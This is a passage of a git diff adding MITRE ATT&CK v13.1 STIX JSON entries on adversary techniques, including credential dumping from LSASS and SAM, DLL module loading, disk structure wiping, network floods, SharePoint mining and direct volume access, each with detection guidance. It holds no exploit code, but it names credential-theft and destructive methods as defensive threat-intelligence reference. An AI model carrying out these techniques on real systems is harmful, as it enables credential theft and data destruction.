restricted information.\n\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_detection": "### Windows\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. \n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n\n### Linux\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", + "x_mitre_version": "2.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Access", + "Process: OS API Execution", + "Active Directory: Active Directory Object Access", + "Process: Process Access", + "Network Traffic: Network Traffic Flow", + "Command: Command Execution", + "File: File Access", + "Process: Process Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "root" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65.json new file mode 100644 index 0000000000000000000000000000000000000000..b467d21255b3757592d746687278309645bf0dab --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--65883957-ede6-411c-b76e-4b47d84ecdcd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Stefan Kanthak" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "created": "2017-05-31T21:31:40.542Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1129", + "url": "https://attack.mitre.org/techniques/T1129" + }, + { + "source_name": "Wikipedia Windows Library Files", + "url": "https://en.wikipedia.org/wiki/Microsoft_Windows_library_files", + "description": "Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.(Citation: Wikipedia Windows Library Files)\n\nThe module loader can load DLLs:\n\n* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;\n \n* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);\n \n* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;\n \n* via <file name=\"filename.extension\" loadFrom=\"fully-qualified or relative pathname\"> in an embedded or external \"application manifest\". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.\n\nAdversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.", + "modified": "2022-04-19T20:31:10.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Shared Modules", + "x_mitre_detection": "Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to %SystemRoot% and %ProgramFiles% directories will protect against module loads from unsafe paths. \n\nCorrelation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Module: Module Load", + "Process: OS API Execution" + ], + "x_mitre_remote_support": false, + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74.json new file mode 100644 index 0000000000000000000000000000000000000000..ec2a596b892286442c6ca9a0dcb82f9c453014df --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--1ab9fa2f-ea35-497d-bfd4-f6e437b677b4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "created": "2020-10-19T23:46:13.931Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1602", + "url": "https://attack.mitre.org/techniques/T1602" + }, + { + "source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", + "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3", + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020." + }, + { + "source_name": "US-CERT TA17-156A SNMP Abuse 2017", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA17-156A", + "description": "US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved October 19, 2020." + }, + { + "source_name": "US-CERT-TA18-106A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.\n\nAdversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)", + "modified": "2022-04-19T21:32:58.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data from Configuration Repository", + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9.json new file mode 100644 index 0000000000000000000000000000000000000000..603caf513153a41d0434102172023dde0124766f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9.json @@ -0,0 +1,96 @@ +{ + "type": "bundle", + "id": "bundle--825fd318-4397-4999-95db-e36e338acf4c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T19:38:24.089Z", + "name": "Disk Structure Wipe", + "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.\n\nFor network infrastructure devices, collect AAA logging to monitor for `format` commands being run to erase the file structure and prevent recovery of the device.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Driver: Driver Load", + "Drive: Drive Modification", + "Drive: Drive Access", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "id": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "created": "2020-02-20T22:10:20.484Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1561/002", + "external_id": "T1561.002" + }, + { + "source_name": "format_cmd_cisco", + "description": "Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668" + }, + { + "source_name": "Unit 42 Shamoon3 2018", + "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" + }, + { + "source_name": "Palo Alto Shamoon Nov 2016", + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + }, + { + "source_name": "FireEye Shamoon Nov 2016", + "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" + }, + { + "source_name": "Kaspersky StoneDrill 2017", + "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf" + }, + { + "source_name": "Microsoft Sysmon v6 May 2017", + "description": "Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon" + }, + { + "source_name": "Symantec Shamoon 2012", + "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", + "url": "https://www.symantec.com/connect/blogs/shamoon-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3.json new file mode 100644 index 0000000000000000000000000000000000000000..8dfc3b6f72ddc9eb674e6af56565b1d7fc520e30 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--a5c14790-b222-4dee-8faa-b91244725679", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:53.685Z", + "name": "Direct Network Flood", + "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Sensor Health: Host Status" + ], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "id": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "created": "2020-03-02T20:07:18.651Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1498/001", + "external_id": "T1498.001" + }, + { + "source_name": "Cisco DoSdetectNetflow", + "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + }, + { + "source_name": "USNYAG IranianBotnet March 2016", + "description": "Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.", + "url": "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92.json new file mode 100644 index 0000000000000000000000000000000000000000..18dce565ebb3dcef4628535411fac744fa349a24 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--a2c95ec3-95b4-4e24-93ae-21399b0bfedb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92", + "type": "attack-pattern", + "created": "2019-04-09T11:51:30.942Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1492", + "url": "https://attack.mitre.org/techniques/T1492" + }, + { + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "source_name": "FireEye APT38 Oct 2018" + }, + { + "source_name": "DOJ Lazarus Sony 2018", + "url": "https://www.justice.gov/opa/press-release/file/1092091/download", + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019." + } + ], + "modified": "2020-03-02T14:24:26.780Z", + "name": "Stored Data Manipulation", + "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_impact_type": [ + "Integrity" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "root", + "SYSTEM" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a.json new file mode 100644 index 0000000000000000000000000000000000000000..0e6049a30a7313dfe8f08c333aefdae0885a28a8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--7ebcae85-027a-42f0-aad8-acccfefd2fd5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "type": "attack-pattern", + "created": "2020-02-14T13:35:32.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1213.002", + "url": "https://attack.mitre.org/techniques/T1213/002" + }, + { + "url": "https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2", + "description": "Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018.", + "source_name": "Microsoft SharePoint Logging" + } + ], + "modified": "2021-06-08T17:10:31.187Z", + "name": "Sharepoint", + "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Application Log: Application Log Content" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5.json new file mode 100644 index 0000000000000000000000000000000000000000..7bcbb51bc8864cf84acbd3bc122dedade12521e9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5.json @@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--689a2bab-e2bd-4b20-ab17-9e615a2c31c1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", + "type": "attack-pattern", + "created": "2017-05-31T21:30:20.934Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1006", + "url": "https://attack.mitre.org/techniques/T1006" + }, + { + "url": "http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin", + "description": "Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.", + "source_name": "Hakobyan 2009" + }, + { + "url": "https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1", + "description": "Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.", + "source_name": "Github PowerSploit Ninjacopy" + } + ], + "modified": "2021-02-09T14:09:00.753Z", + "name": "Direct Volume Access", + "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)\n\nUtilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)\n\nMonitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Drive: Drive Access" + ], + "x_mitre_defense_bypassed": [ + "File monitoring", + "File system access controls" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a.json new file mode 100644 index 0000000000000000000000000000000000000000..b1c400d64c115ce39ce90f576fe78a5478bf51ca --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a.json @@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--812ec80a-7626-4135-bcd4-9d2c5e36f689", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Stefan Kanthak", + "Travis Smith, Tripwire" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a", + "type": "attack-pattern", + "created": "2017-05-31T21:30:43.063Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1044", + "url": "https://attack.mitre.org/techniques/T1044" + }, + { + "external_id": "CAPEC-17", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/17.html" + }, + { + "url": 